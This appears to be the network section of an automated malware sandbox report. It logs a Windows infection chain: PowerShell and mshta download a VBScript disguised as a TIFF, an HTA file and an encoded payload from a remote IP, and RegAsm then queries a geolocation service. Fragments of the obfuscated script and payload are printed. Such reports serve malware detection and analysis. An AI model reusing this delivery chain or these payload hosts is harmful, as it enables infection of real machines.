                                                                                                                                                                                              Oct 8, 2024 15:37:14.155914068 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                                                                                                              Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                                                                                                                              Oct 8, 2024 15:37:14.155958891 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                                                                                                                                              Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253D%252509%252509
                                                                                                                                                                                              Oct 8, 2024 15:37:14.155972004 CEST896INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                                              Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              2192.168.2.224916538.240.44.9803968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Oct 8, 2024 15:37:20.497335911 CEST350OUTGET /590/nicefeaturesworkinggreat.Tif HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                              Host: 38.240.44.9
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Oct 8, 2024 15:37:21.359864950 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:37:24 GMT
                                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 08:19:14 GMT
                                                                                                                                                                                              ETag: "2f66a-623f2caf91c59"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Content-Length: 194154
                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: image/tiff
                                                                                                                                                                                              Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 64 00 69 00 6c 00 69 00 67 00 65 00 6e 00 63 00 69 00 61 00 64 00 6f 00 72 00 28 00 70 00 61 00 6e 00 67 00 75 00 65 00 69 00 72 00 61 00 2c 00 20 00 70 00 61 00 69 00 76 00 6f 00 2c 00 20 00 64 00 69 00 73 00 6e 00 65 00 72 00 76 00 61 00 64 00 6f 00 2c 00 20 00 69 00 6e 00 73 00 61 00 74 00 75 00 72 00 61 00 76 00 65 00 6c 00 6d 00 65 00 6e 00 74 00 65 00 2c 00 20 00 67 00 75 00 61 00 72 00 64 00 65 00 61 00 72 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 64 00 69 00 61 00 6c 00 65 00 63 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 72 00 65 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 6f 00 72 00 6d 00 61 00 74 00 74 00 65 00 64 00 54 00 65 00 78 00 74 00 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: private function diligenciador(pangueira, paivo, disnervado, insaturavelmente, guardear) dim filter dim dialect dim e dim res dim formattedText dim flags flags = 0 if disnervado.ArgumentExists(NPARA_FILTER) then filter = disnervado.Argument(NPARA_FILTER) dialect = URI_WQL_DIALECT end if if disnervado.ArgumentExists(NPARA_DIALECT) then dialect = disnervado.Argume
                                                                                                                                                                                              Oct 8, 2024 15:37:21.359880924 CEST224INData Raw: 00 6e 00 74 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 44 00 49 00 41 00 4c 00 45 00 43 00 54 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20
                                                                                                                                                                                              Data Ascii: nt(NPARA_DIALECT) end if If LCase(dialect) = "selector" Then dialect = "http://schemas.
                                                                                                                                                                                              Oct 8, 2024 15:37:21.360414028 CEST1236INData Raw: 00 64 00 6d 00 74 00 66 00 2e 00 6f 00 72 00 67 00 2f 00 77 00 62 00 65 00 6d 00 2f 00 77 00 73 00 6d 00 61 00 6e 00 2f 00 31 00 2f 00 77 00 73 00 6d 00 61 00 6e 00 2f 00 53 00 65 00 6c 00 65 00 63 00 74 00 6f 00 72 00 46 00 69 00 6c 00 74 00 65
                                                                                                                                                                                              Data Ascii: dmtf.org/wbem/wsman/1/wsman/SelectorFilter" End If If LCase(dialect) = "http://schemas.dmtf.org/wbem/wsman/1/ws
                                                                                                                                                                                              Oct 8, 2024 15:37:21.360486031 CEST1236INData Raw: 00 65 00 78 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 20 00 3d 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 20 00 26 00 20 00 22 00 3c 00 2f 00 77 00 73 00 6d 00 61 00 6e 00 3a 00 53
                                                                                                                                                                                              Data Ascii: ext filter = filter & "</wsman:SelectorSet>" End If If LCase(dialect) = "wql" Then dialect =
                                                                                                                                                                                              Oct 8, 2024 15:37:21.360501051 CEST1236INData Raw: 00 20 00 28 00 64 00 69 00 73 00 6e 00 65 00 72 00 76 00 61 00 64 00 6f 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 41 00 53 00 53 00 4f 00 43 00 49 00 4e
                                                                                                                                                                                              Data Ascii: (disnervado.ArgumentExists(NPARA_ASSOCINST)) Then flags = flags OR pangueira.EnumerationFlagAssociationInst
                                                                                                                                                                                              Oct 8, 2024 15:37:21.360515118 CEST672INData Raw: 00 4e 00 50 00 41 00 52 00 41 00 5f 00 52 00 45 00 54 00 55 00 52 00 4e 00 5f 00 54 00 59 00 50 00 45 00 29 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 61 00 73 00 65 00 20 00 56 00 41 00 4c
                                                                                                                                                                                              Data Ascii: NPARA_RETURN_TYPE)) case VAL_RT_OBJECT ' default case VAL_RT_EPR
                                                                                                                                                                                              Oct 8, 2024 15:37:21.566226959 CEST1236INData Raw: 00 4f 00 4c 00 20 00 66 00 61 00 6c 00 73 00 65 00 2c 00 20 00 22 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 52 00 45 00 54 00 55 00 52 00 4e 00 5f 00 54 00 59 00 50 00 45 00 20 00 26 00 20 00 22 00 3a 00 22 00 20 00 26
                                                                                                                                                                                              Data Ascii: OL false, "-" & NPARA_RETURN_TYPE & ":" & disnervado.Argument(NPARA_RETURN_TYPE) & " is not a valid option" end
                                                                                                                                                                                              Oct 8, 2024 15:37:21.566241980 CEST1236INData Raw: 00 66 00 20 00 45 00 72 00 72 00 2e 00 4e 00 75 00 6d 00 62 00 65 00 72 00 20 00 3d 00 20 00 54 00 5f 00 4f 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 73 00 65 00 74 00 20 00 65 00 20 00 3d 00 20
                                                                                                                                                                                              Data Ascii: f Err.Number = T_O then set e = paivo.diligenciador(insaturavelmente, filter, dialect, flags) if Err.Nu
                                                                                                                                                                                              Oct 8, 2024 15:37:21.566258907 CEST448INData Raw: 00 4e 00 6f 00 74 00 20 00 65 00 2e 00 41 00 74 00 45 00 6e 00 64 00 4f 00 66 00 53 00 74 00 72 00 65 00 61 00 6d 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 6f 00 6e 00 20 00 65 00 72 00 72 00 6f 00 72 00 20 00 72 00 65 00 73
                                                                                                                                                                                              Data Ascii: Not e.AtEndOfStream on error resume next res = e.ReadItem() if Err.Number = T_O then
                                                                                                                                                                                              Oct 8, 2024 15:37:21.566281080 CEST1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 69 00 66
                                                                                                                                                                                              Data Ascii: end if end if if Err.Number <> 0 then stdErr.WriteLine e.Error wscript
                                                                                                                                                                                              Oct 8, 2024 15:37:21.566320896 CEST1236INData Raw: 00 72 00 20 00 3d 00 20 00 22 00 22 00 0d 00 0a 00 65 00 6e 00 64 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 0d 00 0a 00 42 00 75 00 74 00 6f 00 4c 00 6f 00 6b 00 6f 00 4c 00 57 00 57 00 78 00 62 00 74 00 51 00 20 00 3d 00 20 00 22
                                                                                                                                                                                              Data Ascii: r = ""end functionButoLokoLWWxbtQ = "ioKKiReLuLPGGie"iWLWiKlrmtOjiUA = "iQmhOLhoUOaiKGj"btLKmCLWGxfUKnW = "KLLmLs


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              3192.168.2.224917138.240.44.9802104C:\Windows\System32\mshta.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Oct 8, 2024 15:37:32.671202898 CEST463OUTGET /590/un/verynicepersonupdation.hta HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Accept-Language: fr-FR
                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                              If-Modified-Since: Tue, 08 Oct 2024 08:22:57 GMT
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Host: 38.240.44.9
                                                                                                                                                                                              If-None-Match: "1d7be-623f2d847e3f2"
                                                                                                                                                                                              Oct 8, 2024 15:37:33.522465944 CEST275INHTTP/1.1 304 Not Modified
                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:37:36 GMT
                                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 08:22:57 GMT
                                                                                                                                                                                              ETag: "1d7be-623f2d847e3f2"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              4192.168.2.224917238.240.44.9802476C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Oct 8, 2024 15:37:34.294322968 CEST75OUTGET /590/RRSRRD.txt HTTP/1.1
                                                                                                                                                                                              Host: 38.240.44.9
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Oct 8, 2024 15:37:35.149930954 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:37:37 GMT
                                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 08:17:16 GMT
                                                                                                                                                                                              ETag: "a1000-623f2c3f33b7c"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Content-Length: 659456
                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                                                                                                                              Oct 8, 2024 15:37:35.150084019 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                                                                                                                              Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                                                                                                                                                              Oct 8, 2024 15:37:35.150100946 CEST1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                                                                                                                                                              Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                                                                                                                                                              Oct 8, 2024 15:37:35.150111914 CEST672INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                                                                                                                                                                              Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                                                                                                                                                                              Oct 8, 2024 15:37:35.150122881 CEST1236INData Raw: 67 78 4d 51 4d 44 43 7a 41 67 4d 34 4c 44 38 79 67 75 4d 67 4c 44 32 79 41 74 4d 49 4c 44 77 79 67 72 4d 77 4b 44 71 79 41 71 4d 59 4b 44 6b 79 67 6f 4d 41 4b 44 65 79 41 6e 4d 6f 4a 44 59 79 67 6c 4d 51 4a 44 53 79 41 6b 4d 34 49 44 4d 79 67 69
                                                                                                                                                                                              Data Ascii: gxMQMDCzAgM4LD8yguMgLD2yAtMILDwygrMwKDqyAqMYKDkygoMAKDeyAnMoJDYyglMQJDSyAkM4IDMygiMgIDGyAhMIIDAxgfMwHD6xAeMYHD0xgcMAHDuxAbMoGDoxgZMQGDixAYM4FDcxgWMgFDWxAVMIFDQxgTMwEDKxASMYEDExgQMAAD+wAPMoDD4wgNMQDDywAMM4CDswgKMgCDmwAJMICDgwgHMwBDawAGMYBDUwgEM
                                                                                                                                                                                              Oct 8, 2024 15:37:35.150132895 CEST224INData Raw: 39 44 50 2f 51 7a 50 73 38 44 4a 2f 77 78 50 55 38 44 44 2f 51 67 50 38 37 44 39 2b 77 75 50 6b 37 44 33 2b 51 74 50 4d 37 44 78 2b 77 72 50 30 36 44 72 2b 51 71 50 63 36 44 6c 2b 77 6f 50 45 36 44 66 2b 51 6e 50 73 35 44 5a 33 77 38 4e 49 66 44
                                                                                                                                                                                              Data Ascii: 9DP/QzPs8DJ/wxPU8DD/QgP87D9+wuPk7D3+QtPM7Dx+wrP06Dr+QqPc6Dl+woPE6Df+QnPs5DZ3w8NIfDx3A8N8eDu3Q7NweDr3g6NkeDo3w5NYeDi3Q4NAeDf3g3N0dDc3w2NodDZ3A2NcdDW3Q1NQdDT3g0NEdDQ3wzN4cDN3AzNscDK3QyNIcDB3AgNsbD62QuNgbD32gtNUbD02QkNAZDP2giNk
                                                                                                                                                                                              Oct 8, 2024 15:37:35.350083113 CEST1236INData Raw: 59 44 49 32 77 68 4e 59 59 44 46 32 41 68 4e 4d 59 44 41 31 77 66 4e 34 58 44 39 31 41 66 4e 73 58 44 36 31 51 65 4e 67 58 44 33 31 67 64 4e 55 58 44 30 31 77 63 4e 49 58 44 78 31 41 63 4e 38 57 44 75 31 51 62 4e 77 57 44 72 31 67 61 4e 6b 57 44
                                                                                                                                                                                              Data Ascii: YDI2whNYYDF2AhNMYDA1wfN4XD91AfNsXD61QeNgXD31gdNUXD01wcNIXDx1AcN8WDu1QbNwWDr1gaNkWDo1wZNYWDl1AZNMWDi1QYNAWDf1gXN0VDc1wWNoVDZ1AWNcVDW1QVNQVDT1gUNEVDQ1wTN4UDN1ATNsUDK1QSNgUDH1gRNUUDE1wQNIUDAAAQAsBQBQCQMsHj4xgdMOHDxxobMwGjpxwZMSGDix4XM0FjaxAWMWFDT
                                                                                                                                                                                              Oct 8, 2024 15:37:35.350106001 CEST1236INData Raw: 41 65 4e 4f 58 44 76 31 6f 61 4e 59 57 44 56 31 41 45 4e 77 54 54 36 30 34 4b 4e 59 53 6a 5a 30 6f 46 4e 72 51 6a 48 7a 41 2b 4d 2f 4f 54 74 7a 49 36 4d 34 4e 7a 62 7a 67 32 4d 6d 4d 7a 48 79 55 75 4d 50 4c 44 75 79 45 72 4d 49 4b 44 67 79 4d 6d
                                                                                                                                                                                              Data Ascii: AeNOXDv1oaNYWDV1AENwTT604KNYSjZ0oFNrQjHzA+M/OTtzI6M4Nzbzg2MmMzHyUuMPLDuyErMIKDgyMmMVJjRyYQMsDAAAgHAFAAAAAwPU/jp/k3Pn9zT/YkPJ7jA9sePe3T09QcPD2jd98WPo1TY8QOPZzzu8QJPyxzR8MxOvvD47Y9OPrj864JO4jjk3Q9NGfzs3s6NdejV3k0N1czI2srNZVDo1gZNKWTe1wWNhVTI1wAN
                                                                                                                                                                                              Oct 8, 2024 15:37:35.350117922 CEST1236INData Raw: 53 44 6a 30 73 48 4e 78 52 7a 5a 30 41 47 4e 52 52 7a 53 30 51 45 4e 35 49 54 76 79 49 72 4d 53 46 6a 2b 78 51 66 4d 75 48 7a 32 78 30 63 4d 46 48 6a 72 78 51 61 4d 5a 47 7a 6b 78 34 59 4d 70 46 44 59 78 77 54 4d 30 41 54 39 77 30 4f 4d 73 43 54
                                                                                                                                                                                              Data Ascii: SDj0sHNxRzZ0AGNRRzS0QEN5ITvyIrMSFj+xQfMuHz2x0cMFHjrxQaMZGzkx4YMpFDYxwTM0AT9w0OMsCTow4EMIBAAAAKAEAJA/E+PZ/zy/M8P6+Ts/k6Ph+Tm/44P89Dd/g2Pg9zV/40PG9jP/YzPu8TI/UxPN4zz+MqP35DU+okPE5jP+YjPy4zJ+ghPM0z+98ePd3Tu9oaPc2je9UXPw1DX9EVP80zL9QCP1zz18INPNzjw
                                                                                                                                                                                              Oct 8, 2024 15:37:35.350241899 CEST1236INData Raw: 34 59 4e 6a 55 54 48 31 63 52 4e 4e 51 54 75 30 55 4b 4e 66 53 54 6a 30 30 45 4e 79 51 44 49 30 38 41 4e 47 4d 44 2f 7a 51 2f 4d 69 50 6a 6d 7a 45 35 4d 2f 4e 44 65 7a 34 67 4d 39 4c 44 2b 79 77 75 4d 6e 4c 44 31 79 67 73 4d 42 4c 6a 71 79 51 70
                                                                                                                                                                                              Data Ascii: 4YNjUTH1cRNNQTu0UKNfSTj00ENyQDI08ANGMD/zQ/MiPjmzE5M/NDez4gM9LD+ywuMnLD1ygsMBLjqyQpM+Jzby8jMjIDExkeMTDznw4GMjBDSwQCMIAAAAgLAEADA/YvPf6Tg+MmPe0DN9cSPX0jC8IFPSwDA7M/OovDx7Q5OHuTb7IgOCnzH5owNNYDr2ISNYXzw1kWNWQTCzsyMIID2xcMAAAATAQAIAszY4UxN4fjp3AkN
                                                                                                                                                                                              Oct 8, 2024 15:37:35.350254059 CEST1236INData Raw: 79 44 71 38 51 4b 50 67 79 7a 6d 38 59 46 50 41 73 44 2f 37 67 2f 4f 30 76 7a 37 37 67 2b 4f 78 71 7a 41 35 55 66 4f 58 6e 44 78 33 77 79 4e 6f 63 44 4a 33 41 79 4e 62 59 6a 31 32 41 6f 4e 38 5a 44 65 32 51 6e 4e 76 5a 44 61 32 45 44 4e 44 53 54
                                                                                                                                                                                              Data Ascii: yDq8QKPgyzm8YFPAsD/7g/O0vz77g+OxqzA5UfOXnDx3wyNocDJ3AyNbYj12AoN8ZDe2QnNvZDa2EDNDSTd0cFNENDlzE1MLNzOzIhMpLzwyEqMbKTjygoMCKDfyYnMxJzayUmMfJjWyQlMOJDSyMkM9IzNyEjMsIjJyAiMaITFy8gMJIzAx4fM4Hj8xweMnHT4xsdMVHD0xocMEHjvxkbMzGTrxcaMiGDnxYZMQGzixUYM/FTe


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              5192.168.2.2249175178.237.33.50803592C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Oct 8, 2024 15:37:39.357197046 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                              Host: geoplugin.net
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Oct 8, 2024 15:37:39.972529888 CEST1170INHTTP/1.1 200 OK
                                                                                                                                                                                              date: Tue, 08 Oct 2024 13:37:39 GMT
                                                                                                                                                                                              server: Apache
                                                                                                                                                                                              content-length: 962
                                                                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                                                                              cache-control: public, max-age=300
                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
